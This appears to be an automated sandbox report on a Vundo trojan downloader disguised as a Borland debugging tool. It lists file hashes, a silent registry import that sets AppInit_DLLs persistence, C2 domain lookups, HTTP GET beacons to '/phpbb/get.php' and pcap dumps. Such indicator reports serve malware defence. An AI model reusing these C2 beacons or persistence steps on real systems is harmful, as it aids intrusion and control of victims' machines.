Analysis Date2013-08-27 07:13:46
MD576a3710c8ad85d059462174b83ee0764
SHA1fc715121515e89ef3185be9275e2801b85a849a9

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 859347ea262c1ddd785df4d935a40a11 sha1: 5118b2c2ecb0f0d9e5269de2db5915f0c63fe114 size: 90112
Section_ASM2 md5: 7e8100fae12e674085dd00b4fcf96f47 sha1: 8ddb457f26b7d001eceae20fe39f22bbcfd582f6 size: 62464
Section.rdata md5: 5be8eeb9fca386416f85ea22499ceea0 sha1: 727790a1b349b756866dec182b860ae1ac42c56c size: 7680
Section.data md5: 2767189675229ebbbf795a730d76f5ec sha1: b7e9bb7beee752a0c5ef176560de12e1ae9a1c4e size: 5120
Section.tls md5: bf619eac0cdf3f68d496ea9344137e8b sha1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 size: 512
Section.rsrc md5: 0700f6ce8a5c5f57f0abb43c0bfc0e28 sha1: 013ef4a4db6e77f6a2b3b73eb17e54ab68d4b788 size: 17920
Timestamp2012-09-18 20:32:43
VersionLegalCopyright: Copyright © Borland Software Corporation 1990, 2001
InternalName: BORDBG61
FileVersion: 70.08.08.1442
CompanyName: Borland Software Corporation
ProductName: Borland Remote Debugging Server
ProductVersion: 51.00
FileDescription: Borland Remote Debugging Server
OriginalFilename: bordbg61.exe
PackerMicrosoft Visual C++ ?.?
PEhash96d5eb0902d5e1a03adc8ac7b1a6d8be8e91e4b8
AVavgGeneric29.BLEL
AVmsseTrojanDownloader:Win32/Vundo.J

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Creates FileC:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

Process
↳ C:\WINDOWS\Explorer.EXE

RegistryHKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\Old WorkAreas\NoOfOldWorkAreas ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories\{00021494-0000-0000-C000-000000000046}\Enum\Implementing ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\ProgramsCache ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\NetCache\AdminPinStartTime ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories\{00021493-0000-0000-C000-000000000046}\Enum\Implementing ➝
NULL
RegistryHKEY_CURRENT_USER\SessionInformation\ProgramCount ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets\SysTray\Services ➝
31
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\TrayNotify\PastIconsStream ➝
NULL
Creates File\Device\Afd\Endpoint
Creates FileC:\WINDOWS\system32\jyyvabj.dll
Creates FileC:\Documents and Settings\Administrator\Cookies\cf
Deletes FileC:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Deletes FileC:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates Process
Creates ProcessC:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates MutexShell.CMruPidlList
Winsock DNS91.233.89.106
Winsock DNSclickbeta.ru
Winsock DNSdenadb.com
Winsock DNSterrans.su
Winsock DNSnsknock.com
Winsock DNStryatdns.com
Winsock DNSclickclans.ru
Winsock DNSdenareclick.com
Winsock DNSgleospond.com
Winsock DNSfescheck.com
Winsock DNSinstrango.com
Winsock DNStegimode.com
Winsock DNSnetrovad.com
Winsock DNSnshouse1.com
Winsock DNSforadns.com
Winsock DNSgetavodes.com
Winsock DNSclickstano.com

Process
↳ Pid 836

Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝
C:\WINDOWS\system32\jyyvabj.dll\\x00

Network Details:

DNSgleospond.com
Type: A
91.220.35.154
DNSgetavodes.com
Type: A
91.220.35.154
DNStryatdns.com
Type: A
62.116.143.15
DNSfescheck.com
Type: A
62.116.143.15
DNSdenadb.com
Type: A
208.73.210.203
DNSforadns.com
Type: A
208.73.210.202
DNSnshouse1.com
Type: A
208.73.210.203
DNSinstrango.com
Type: A
DNSnetrovad.com
Type: A
DNSnsknock.com
Type: A
DNSterrans.su
Type: A
DNStegimode.com
Type: A
DNSclickstano.com
Type: A
DNSdenareclick.com
Type: A
DNSclickbeta.ru
Type: A
DNSclickclans.ru
Type: A
HTTP GEThttp://gleospond.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1703&av=0&vm=0&al=0&p=266&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygzBy3Y376hjnjC2g+tC6Hf8r8NPyPJPs2GWEpswZftF3
User-Agent:
HTTP GEThttp://getavodes.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1703&av=0&vm=0&al=0&p=266&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygzBy3Y376hjnjC2g+tC6Hf8r8NPyPJPs2KNZFlgNCD6S
User-Agent:
HTTP GEThttp://tryatdns.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1703&av=0&vm=0&al=0&p=266&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygzBy3Y376hjnjC2g+tC6Hf8r8NPyPJPs2AAeHOkSkSgd
User-Agent:
HTTP GEThttp://fescheck.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1703&av=0&vm=0&al=0&p=266&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygzBy3Y376hjnjC2g+tC6Hf8r8NPyPJPs2OO0Nx6jrf4a
User-Agent:
HTTP GEThttp://denadb.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1703&av=0&vm=0&al=0&p=266&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygzBy3Y376hjnjC2g+tC6Hf8r8NPyPJPs2PdYaH3N0hop
User-Agent:
HTTP GEThttp://foradns.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1703&av=0&vm=0&al=0&p=266&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygzBy3Y376hjnjC2g+tC6Hf8r8NPyPJPs2L6vMC0xJQa/
User-Agent:
HTTP GEThttp://nshouse1.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1703&av=0&vm=0&al=0&p=266&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygzBy3Y376hjnjC2g+tC6Hf8r8NPyPJPs2JR4qnX7XtN3
User-Agent:
HTTP GEThttp://91.233.89.106/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1703&av=0&vm=0&al=0&p=266&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygzBy3Y376hjnjC2g+tC6Hf8r8NPyPJPs2HlBQcYGnWyc
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 91.220.35.154:80
Flows TCP192.168.1.1:1032 ➝ 91.220.35.154:80
Flows TCP192.168.1.1:1033 ➝ 62.116.143.15:80
Flows TCP192.168.1.1:1034 ➝ 62.116.143.15:80
Flows TCP192.168.1.1:1035 ➝ 208.73.210.203:80
Flows TCP192.168.1.1:1036 ➝ 208.73.210.202:80
Flows TCP192.168.1.1:1037 ➝ 208.73.210.203:80
Flows TCP192.168.1.1:1038 ➝ 91.233.89.106:80

Raw Pcap
0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 37303326   XX0000&key=1703&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323636 266f733d 352e312e 32363030   =266&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   5779677a 42793359 33373668 6a6e6a43   WygzBy3Y376hjnjC
0x000000b0 (00176)   32672b74 43364866 3872384e 5079504a   2g+tC6Hf8r8NPyPJ
0x000000c0 (00192)   50733247 57457073 775a6674 46332048   Ps2GWEpswZftF3 H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2067   TTP/1.1..Host: g
0x000000e0 (00224)   6c656f73 706f6e64 2e636f6d 0d0a0d0a   leospond.com....
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 37303326   XX0000&key=1703&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323636 266f733d 352e312e 32363030   =266&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   5779677a 42793359 33373668 6a6e6a43   WygzBy3Y376hjnjC
0x000000b0 (00176)   32672b74 43364866 3872384e 5079504a   2g+tC6Hf8r8NPyPJ
0x000000c0 (00192)   5073324b 4e5a466c 674e4344 36532048   Ps2KNZFlgNCD6S H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2067   TTP/1.1..Host: g
0x000000e0 (00224)   65746176 6f646573 2e636f6d 0d0a0d0a   etavodes.com....
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 37303326   XX0000&key=1703&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323636 266f733d 352e312e 32363030   =266&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   5779677a 42793359 33373668 6a6e6a43   WygzBy3Y376hjnjC
0x000000b0 (00176)   32672b74 43364866 3872384e 5079504a   2g+tC6Hf8r8NPyPJ
0x000000c0 (00192)   50733241 4165484f 6b536b53 67642048   Ps2AAeHOkSkSgd H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2074   TTP/1.1..Host: t
0x000000e0 (00224)   72796174 646e732e 636f6d0d 0a0d0a0a   ryatdns.com.....
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 37303326   XX0000&key=1703&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323636 266f733d 352e312e 32363030   =266&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   5779677a 42793359 33373668 6a6e6a43   WygzBy3Y376hjnjC
0x000000b0 (00176)   32672b74 43364866 3872384e 5079504a   2g+tC6Hf8r8NPyPJ
0x000000c0 (00192)   5073324f 4f304e78 366a7266 34612048   Ps2OO0Nx6jrf4a H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2066   TTP/1.1..Host: f
0x000000e0 (00224)   65736368 65636b2e 636f6d0d 0a0d0a0a   escheck.com.....
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 37303326   XX0000&key=1703&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323636 266f733d 352e312e 32363030   =266&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   5779677a 42793359 33373668 6a6e6a43   WygzBy3Y376hjnjC
0x000000b0 (00176)   32672b74 43364866 3872384e 5079504a   2g+tC6Hf8r8NPyPJ
0x000000c0 (00192)   50733250 64596148 334e3068 6f702048   Ps2PdYaH3N0hop H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2064   TTP/1.1..Host: d
0x000000e0 (00224)   656e6164 622e636f 6d0d0a0d 0a0d0a0a   enadb.com.......
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 37303326   XX0000&key=1703&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323636 266f733d 352e312e 32363030   =266&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   5779677a 42793359 33373668 6a6e6a43   WygzBy3Y376hjnjC
0x000000b0 (00176)   32672b74 43364866 3872384e 5079504a   2g+tC6Hf8r8NPyPJ
0x000000c0 (00192)   5073324c 36764d43 30784a51 612f2048   Ps2L6vMC0xJQa/ H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2066   TTP/1.1..Host: f
0x000000e0 (00224)   6f726164 6e732e63 6f6d0d0a 0d0a0a0a   oradns.com......
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 37303326   XX0000&key=1703&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323636 266f733d 352e312e 32363030   =266&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   5779677a 42793359 33373668 6a6e6a43   WygzBy3Y376hjnjC
0x000000b0 (00176)   32672b74 43364866 3872384e 5079504a   2g+tC6Hf8r8NPyPJ
0x000000c0 (00192)   5073324a 5234716e 58375874 4e332048   Ps2JR4qnX7XtN3 H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a206e   TTP/1.1..Host: n
0x000000e0 (00224)   73686f75 7365312e 636f6d0d 0a0d0a0a   shouse1.com.....
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 37303326   XX0000&key=1703&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323636 266f733d 352e312e 32363030   =266&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   5779677a 42793359 33373668 6a6e6a43   WygzBy3Y376hjnjC
0x000000b0 (00176)   32672b74 43364866 3872384e 5079504a   2g+tC6Hf8r8NPyPJ
0x000000c0 (00192)   50733248 6c425163 59476e57 79632048   Ps2HlBQcYGnWyc H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2039   TTP/1.1..Host: 9
0x000000e0 (00224)   312e3233 332e3839 2e313036 0d0a0d0a   1.233.89.106....
0x000000f0 (00240)                                         


Strings